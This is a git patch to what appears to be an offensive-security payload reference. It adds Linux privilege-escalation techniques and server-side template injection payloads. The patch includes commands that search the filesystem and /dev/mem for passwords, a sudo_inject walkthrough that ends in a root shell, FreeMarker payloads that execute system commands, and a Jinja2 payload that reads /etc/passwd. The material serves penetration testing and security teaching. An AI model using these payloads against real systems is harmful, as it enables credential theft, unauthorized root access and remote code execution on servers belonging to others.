From b4633bbb668f581df160539a6fd87168136a3c74 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 14 Apr 2019 21:01:14 +0200 Subject: [PATCH] sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords --- .../Linux - Privilege Escalation.md | 50 ++++++++++++++++++- Server Side Template Injection/README.md | 17 +++++-- 2 files changed, 61 insertions(+), 6 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 1421684..9242f04 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -13,6 +13,10 @@ ## Summary * [Checklist](#checklist) +* [Looting for passwords](#looting-for-passwords) + * [Files containing passwords](#files-containing-passwords) + * [Last edited files](#last-edited-files) + * [In memory passwords](#in-memory-passwords) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) @@ -27,6 +31,7 @@ * [NOPASSWD](#nopasswd) * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd) * [Doas](#doas) + * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) * [Writable /etc/passwd](#writable---etc---passwd) @@ -111,6 +116,29 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container +## Looting for passwords + +### Files containing passwords + +```powershell +grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null +find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; +``` + +### Last edited files + +Files that were edited in the last 10 minutes + +```powershell +find / -mmin -10 2>/dev/null | grep -Ev "^/proc" +``` + +### In memory passwords + +```powershell +strings /dev/mem -n10 | grep -i PASS +``` + ## Scheduled tasks ### Cron jobs @@ -216,7 +244,6 @@ sh-5.0# id uid=0(root) gid=1000(swissky) ``` - ## SUDO ### NOPASSWD @@ -269,6 +296,24 @@ There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, rem permit nopass demo as root cmd vim ``` +### sudo_inject + +Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) + +```powershell +$ sudo whatever +[sudo] password for user: +# Press +c since you don't have the password. +# This creates an invalid sudo tokens. +$ sh exploit.sh +.... wait 1 seconds +$ sudo -i # no password required :) +# id +uid=0(root) gid=0(root) groups=0(root) +``` + +Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. @@ -470,4 +515,5 @@ lxc exec mycontainer /bin/sh - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) -- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) \ No newline at end of file +- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 51334ac..f994467 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -20,6 +20,8 @@ * [Code execution](#code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Jade / Codepen](#jade---codepen) * [Velocity](#velocity) * [Mako](#mako) @@ -137,11 +139,17 @@ $output = $twig > render ( ## Freemarker -Default functionality. +You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) -```python -<#assign -ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +### Basic injection + +The template can be `${3*3}` or the legacy `#{3*3}` + +### Code execution + +```js +<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ``` ## Jade / Codepen @@ -228,6 +236,7 @@ The above injections have been tested on Flask application. ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }} ``` ### Write into remote file